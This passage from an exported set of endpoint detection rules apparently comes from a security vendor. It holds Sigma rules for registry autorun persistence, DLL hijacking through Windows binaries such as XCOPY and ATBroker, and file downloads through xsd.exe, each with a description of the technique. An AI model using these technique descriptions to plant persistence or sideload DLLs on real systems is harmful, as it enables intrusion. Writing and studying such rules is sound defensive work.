-startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\oneapp'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --existing-window'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartchromium'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --no-startup-window --from-registry /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onestart.ai\\onestart\\application\\onestart.exe\" --update'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onestartupdate'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\artlist\\artlist hub.exe --hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.artlist hub'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\authenticator ?\\authenticator ?.exe\" --hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\authenticator 6'\n - 
Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\curseforge windows\\curseforge.exe --minimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.curseforge'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\doctolib\\doctolib.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\com.doctolib.pro.desktop'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\lively wallpaper\\lively.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\lively'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\module coliship\\module coliship.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\module coliship'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisra2\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisraapp\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\monsisra\\monsisra2.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\monsisra'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\opera gx\\opera.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\opera gx stable'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\parceo-discussions-app\\parceo-discussions.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\parceo-discussions'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\ringover\\resources\\app.asar'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ringover'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\ringover\\ringover.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ringover'\n - Details: 
'?:\\Users\\\\*\\AppData\\Local\\programs\\spico-discussions-app\\spico-discussions.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spico-discussions'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\tldv\\tldv.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.tldv'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\twinkle-tray\\twinkle tray.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\electron.app.twinkle tray'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\programs\\zalo\\zalo.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\zalo'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\shift\\chromium\\shift.exe\" --launch-source=sign-in'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\shiftautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\spark\\spark.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spark'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\tel4b\\production\\myistra\\myistra.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistra'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\ciscowebexstart.exe\" /daemon /from=autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\webexhost.exe\" /daemon /from=autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\webex\\webexhost.exe\" /daemon /runfrom=autorun'\n TargetObject: 
'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ciscomeetingdaemon'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\xivo-desktop-assistant\\update.exe\" --processstart \"xivo-desktop-assistant.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\xivo-desktop-assistant'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\xivo-desktop-assistant\\xivo-desktop-assistant.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\xivo-desktop-assistant'\n - Details: '\"?:\\Users\\\\*\\AppData\\Roaming\\adobe\\connect\\connectdetector.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\connectdetector'\n - Details: '?:\\Users\\\\*\\AppData\\Roaming\\asus\\smartkvm1591\\functmodules\\{*}\\smartdata.exe -gn:runfromregistry -gs* -gs:apploaderexename:smartkvm.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\cs dispatch'\n - Details: '?:\\Users\\\\*\\AppData\\Roaming\\spotify\\spotify.exe --autostart --minimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\spotify'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\programs\\wazo\\wazo desktop.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wazo.client.desktop'\n - Details: '?:\\Users\\\\*\\downloads\\unikey*\\unikeynt.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\unikey'\n - Details: '\"?:\\Users\\\\*\\mon-assistant-marche-public\\mon assistant marches publics.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mon assistant marches publics'\n - Details: '?:\\windows\\explorer.exe me.blueone.win:noopt:hidden'\n TargetObject: 
'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\bluemail'\n - Details: '?:\\windows\\temp\\tcagentcleanup_logicnow.exe /instance _logicnow'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Runonce\\basupsrvcuninstallcomplete_logicnow'\n - Details: '?:\\windows\\temp\\tcagentcleanup_n-central.exe /instance _n-central'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Runonce\\basupsrvcuninstallcomplete_n-central'\n - Details: '?:\\windows\\twain_32\\brims???\\common\\twdsuilaunch.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\s???'\n - Details: '?:\\windows\\twain_32\\fjicube\\fjtwmkic.exe /station'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\fjtwainic setup'\n - Details: '?:\\windows\\twain_32\\fjicube\\icwiachecker.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\icwia service checker'\n - Details: '?:\\windows\\twain_32\\fjscan32\\sop\\ftlnsop.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\ftlnsop_setup'\n - Details: 'devdetect.exe -autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\device detector'\n - Details: '\"*\\rca\\rcasuite\\rcasuite.exe\" /minimize'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\rca suite'\n - Details: 'philipsspeechdriverconfiguration.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\philipsspeechdriverconfiguration'\n - Details: 'pspcontr.exe'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\pspcontr'\n - Details: 'regedit.exe /s ?:\\ProgramData\\mo\\mo-dict.reg'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mo_dict'\n - Details: 'reg.exe delete hklm\\system\\controlset001\\services\\basicdisplay /v 
acceleration.level /f'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\bomgar hardware acceleration restore [\\device\\video*]'\n - Details: '*\\inot.san\\i-not\\cti\\cti.bat'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\cti'\n - Details: '%windir%\\azurearcsetup\\systray\\azurearcsystray.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Run\\azurearcsetup'\n - Details: 'cmd /c REG ADD ?HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Search? /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SearchboxTaskbarMode'\n - Details: 'cmd /c REG ADD ?HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced? /v TaskbarMn /t REG_DWORD /d 0 /f'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\TaskbarMn'\n - Details: '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\netfxupdate.exe? 0 v* GAC + NI NID'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NetFxUpdate_v*'\n - Details: '?:\\ProgramData\\Package Cache\\{????????-????-????-????-????????????}\\CybereasonSensor.exe? /uninstall /quiet /NoRestart'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!UninstallOldCrSensor.{????????-????-????-????-????????????}'\n - Details: '?:\\Windows\\Temp\\MUBSTemp\\BCILauncher.exe bgaupmi=????????????????????????????????'\n TargetObject: 'HKU\\\\*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!BCILauncher'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\Programs\\Authenticator ?\\Authenticator.exe? 
--hidden'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Authenticator'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\ScreenCast\\Upgrade.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Upgrade'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\Suuntolink\\app-*\\resources\\app\\LaunchAgents\\SuuntolinkLauncher.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SuuntolinkLauncher'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "970dca0d-7bda-4ab7-a60c-a23fa59e6627",
"rule_name": "Registry Autorun Key Added",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9711dafd-3fde-40dd-9d4d-7804b4b4fa07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601429Z",
"creation_date": "2026-03-23T11:45:34.601433Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_xcopy.yml",
"content": "title: DLL Hijacking via XCOPY.exe\nid: 9711dafd-3fde-40dd-9d4d-7804b4b4fa07\ndescription: |\n Detects potential Windows DLL Hijacking via XCOPY.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'XCOPY.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9711dafd-3fde-40dd-9d4d-7804b4b4fa07",
"rule_name": "DLL Hijacking via XCOPY.exe",
"rule_description": "Detects potential Windows DLL Hijacking via XCOPY.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "971e1089-25f4-4f7c-871c-3d7c3abefabb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082740Z",
"creation_date": "2026-03-23T11:45:34.082742Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082747Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_xsd_lolbas_tool_transfer.yml",
"content": "title: File Downloaded via xsd.exe\nid: 971e1089-25f4-4f7c-871c-3d7c3abefabb\ndescription: |\n Detects a suspicious execution of the xsd.exe executable to download a remote file.\n The downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or other files to a compromised environment using legitimate tools to evade detection.\n It is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/12/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Xsd\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n - Image|endswith: '\\xsd.exe'\n # Renamed binaries\n - OriginalFileName: 'xsd.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - 'http'\n - 'ftp://'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "971e1089-25f4-4f7c-871c-3d7c3abefabb",
"rule_name": "File Downloaded via xsd.exe",
"rule_description": "Detects a suspicious execution of the xsd.exe executable to download a remote file.\nThe downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or other files to a compromised environment using legitimate tools to evade detection.\nIt is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\n",
"rule_creation_date": "2024-12-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9742d744-56b7-4e82-b4a6-5c27217bec3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081916Z",
"creation_date": "2026-03-23T11:45:34.081918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_atbroker.yml",
"content": "title: DLL Hijacking via ATBroker.exe\nid: 9742d744-56b7-4e82-b4a6-5c27217bec3a\ndescription: |\n Detects potential Windows DLL Hijacking via ATBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ATBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9742d744-56b7-4e82-b4a6-5c27217bec3a",
"rule_name": "DLL Hijacking via ATBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ATBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "974dd9cb-ae25-42fd-972c-3f04914794a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600625Z",
"creation_date": "2026-03-23T11:45:34.600629Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_verifiergui.yml",
"content": "title: DLL Hijacking via verifiergui.exe\nid: 974dd9cb-ae25-42fd-972c-3f04914794a4\ndescription: |\n Detects potential Windows DLL Hijacking via verifiergui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'verifiergui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "974dd9cb-ae25-42fd-972c-3f04914794a4",
"rule_name": "DLL Hijacking via verifiergui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via verifiergui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9761fea2-6074-4aef-b841-6fe34bf9c564",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
